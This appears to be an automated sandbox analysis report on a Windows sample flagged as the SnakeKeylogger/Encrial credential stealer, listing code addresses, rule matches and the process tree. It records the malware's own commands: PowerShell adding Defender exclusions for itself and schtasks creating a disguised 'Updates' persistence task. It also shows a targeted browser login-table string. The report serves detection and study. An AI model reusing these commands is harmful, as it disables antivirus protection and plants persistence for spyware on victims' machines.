Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148E6AF	20_2_0148E6AF
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0148E6B0	20_2_0148E6B0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AE548	20_2_015AE548
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A81D0	20_2_015A81D0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A7B78	20_2_015A7B78
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A7720	20_2_015A7720
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A8FB0	20_2_015A8FB0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AC558	20_2_015AC558
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A0D48	20_2_015A0D48
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AC548	20_2_015AC548
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AA938	20_2_015AA938
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AE538	20_2_015AE538
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AA928	20_2_015AA928
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AE9D8	20_2_015AE9D8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AC9D8	20_2_015AC9D8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AE9C8	20_2_015AE9C8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A15F8	20_2_015A15F8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AC9E8	20_2_015AC9E8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A15E8	20_2_015A15E8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A119F	20_2_015A119F
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A11A0	20_2_015A11A0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A3450	20_2_015A3450
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A0040	20_2_015A0040
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A6478	20_2_015A6478
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A3460	20_2_015A3460
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AFC18	20_2_015AFC18
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015ADC19	20_2_015ADC19
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A3008	20_2_015A3008
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015ABC38	20_2_015ABC38
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A6030	20_2_015A6030
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015ABC2A	20_2_015ABC2A
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015ADC28	20_2_015ADC28
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A6022	20_2_015A6022
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AC0C8	20_2_015AC0C8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A08F0	20_2_015A08F0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A0498	20_2_015A0498
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A6488	20_2_015A6488
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A38B8	20_2_015A38B8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AE0B8	20_2_015AE0B8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AC0B7	20_2_015AC0B7
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AE0A7	20_2_015AE0A7
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A2758	20_2_015A2758
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A2749	20_2_015A2749
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AF778	20_2_015AF778
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A5770	20_2_015A5770
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A7B69	20_2_015A7B69
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AB318	20_2_015AB318
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AD308	20_2_015AD308
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A2300	20_2_015A2300
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AB307	20_2_015AB307
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A5328	20_2_015A5328
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A7722	20_2_015A7722
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A5BD8	20_2_015A5BD8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A2FF9	20_2_015A2FF9
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AD798	20_2_015AD798
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AB798	20_2_015AB798
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AF788	20_2_015AF788
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A5780	20_2_015A5780
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AD787	20_2_015AD787
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A2BB0	20_2_015A2BB0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AB7A8	20_2_015AB7A8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A2BA0	20_2_015A2BA0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A8FA1	20_2_015A8FA1
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A1A50	20_2_015A1A50
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AEE57	20_2_015AEE57
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A1A4F	20_2_015A1A4F
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A4A78	20_2_015A4A78
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015ACE78	20_2_015ACE78
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A6E72	20_2_015A6E72
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A6E70	20_2_015A6E70
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AEE68	20_2_015AEE68
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015ACE67	20_2_015ACE67
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A6A18	20_2_015A6A18
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A6A07	20_2_015A6A07
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A4622	20_2_015A4622
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A4620	20_2_015A4620
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A4ED0	20_2_015A4ED0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A72CA	20_2_015A72CA
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A72C8	20_2_015A72C8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A4EC0	20_2_015A4EC0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AF2F8	20_2_015AF2F8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A22F0	20_2_015A22F0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AD2F7	20_2_015AD2F7
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015AF2E7	20_2_015AF2E7
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A1E98	20_2_015A1E98
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_015A1EA8	20_2_015A1EA8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01664371	20_2_01664371
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_016625F8	20_2_016625F8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01662CE0	20_2_01662CE0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01668CE0	20_2_01668CE0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01661148	20_2_01661148
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_016633C8	20_2_016633C8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01661830	20_2_01661830
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01663AB0	20_2_01663AB0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01661F10	20_2_01661F10
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_016603F0	20_2_016603F0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_016625E8	20_2_016625E8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01660400	20_2_01660400
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01660DD0	20_2_01660DD0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01662CD0	20_2_01662CD0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01660C9E	20_2_01660C9E
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_0166113C	20_2_0166113C
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_016633BA	20_2_016633BA
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01661821	20_2_01661821
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01663AA0	20_2_01663AA0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_01661EFF	20_2_01661EFF
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032E5362	20_2_032E5362
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032ED278	20_2_032ED278
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032E7118	20_2_032E7118
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032EC147	20_2_032EC147
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032EA088	20_2_032EA088
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032EC738	20_2_032EC738
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032EC468	20_2_032EC468
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032ECA08	20_2_032ECA08
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032E69A0	20_2_032E69A0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032EE988	20_2_032EE988
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032ECFAB	20_2_032ECFAB
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032ECCD8	20_2_032ECCD8
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032E3A99	20_2_032E3A99
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032EE97B	20_2_032EE97B
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032EF974	20_2_032EF974
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032E29E0	20_2_032E29E0
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Code function: 20_2_032E3E09	20_2_032E3E09

Source: Ti5nuRV7y4.exe, 00000000.00000002.1309507329.000000000303D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Ti5nuRV7y4.exe
Source: Ti5nuRV7y4.exe, 00000000.00000002.1316105655.0000000007340000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Ti5nuRV7y4.exe
Source: Ti5nuRV7y4.exe, 00000000.00000002.1302634124.000000000100E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Ti5nuRV7y4.exe
Source: Ti5nuRV7y4.exe, 00000000.00000000.1243582673.0000000000BDC000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePfkm.exe" vs Ti5nuRV7y4.exe
Source: Ti5nuRV7y4.exe, 00000000.00000002.1317731899.0000000007660000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Ti5nuRV7y4.exe
Source: Ti5nuRV7y4.exe, 00000000.00000002.1316404680.00000000073BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowe6 vs Ti5nuRV7y4.exe
Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Ti5nuRV7y4.exe
Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Ti5nuRV7y4.exe
Source: Ti5nuRV7y4.exe, 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Ti5nuRV7y4.exe
Source: Ti5nuRV7y4.exe, 0000000E.00000002.3696172047.00000000010F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Ti5nuRV7y4.exe
Source: Ti5nuRV7y4.exe	Binary or memory string: OriginalFilenamePfkm.exe" vs Ti5nuRV7y4.exe

Source: Ti5nuRV7y4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 20.2.aoTiGLRa.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.1310956268.0000000003FE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Ti5nuRV7y4.exe PID: 792, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Ti5nuRV7y4.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: aoTiGLRa.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Ti5nuRV7y4.exe.3fe9970.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Ti5nuRV7y4.exe.7340000.3.raw.unpack, id.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, e9vnVJvXef3cnAd7TZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, IVgKmK05cbPEb74WYZ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, IVgKmK05cbPEb74WYZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, IVgKmK05cbPEb74WYZ.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, IVgKmK05cbPEb74WYZ.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, IVgKmK05cbPEb74WYZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Ti5nuRV7y4.exe.7660000.4.raw.unpack, IVgKmK05cbPEb74WYZ.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Ti5nuRV7y4.exe.40ccd48.2.raw.unpack, e9vnVJvXef3cnAd7TZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/15@4/4

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe

File created: C:\Users\user\AppData\Roaming\aoTiGLRa.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5884:120:WilError_03

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe

File created: C:\Users\user\AppData\Local\Temp\tmpD06F.tmp

Jump to behavior

Source: Ti5nuRV7y4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Ti5nuRV7y4.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.000000000348A000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003447000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003465000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003497000.00000004.00000800.00020000.00000000.sdmp, Ti5nuRV7y4.exe, 0000000E.00000002.3699461711.0000000003457000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000035C4000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000035F6000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000035B6000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000035EA000.00000004.00000800.00020000.00000000.sdmp, aoTiGLRa.exe, 00000014.00000002.3699672767.00000000035A6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Ti5nuRV7y4.exe

ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe

File read: C:\Users\user\Desktop\Ti5nuRV7y4.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Ti5nuRV7y4.exe "C:\Users\user\Desktop\Ti5nuRV7y4.exe"
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Users\user\Desktop\Ti5nuRV7y4.exe "C:\Users\user\Desktop\Ti5nuRV7y4.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\aoTiGLRa.exe C:\Users\user\AppData\Roaming\aoTiGLRa.exe
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process created: C:\Users\user\AppData\Roaming\aoTiGLRa.exe "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ti5nuRV7y4.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\aoTiGLRa.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpD06F.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Ti5nuRV7y4.exe	Process created: C:\Users\user\Desktop\Ti5nuRV7y4.exe "C:\Users\user\Desktop\Ti5nuRV7y4.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aoTiGLRa.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aoTiGLRa" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp"	Jump to behavior
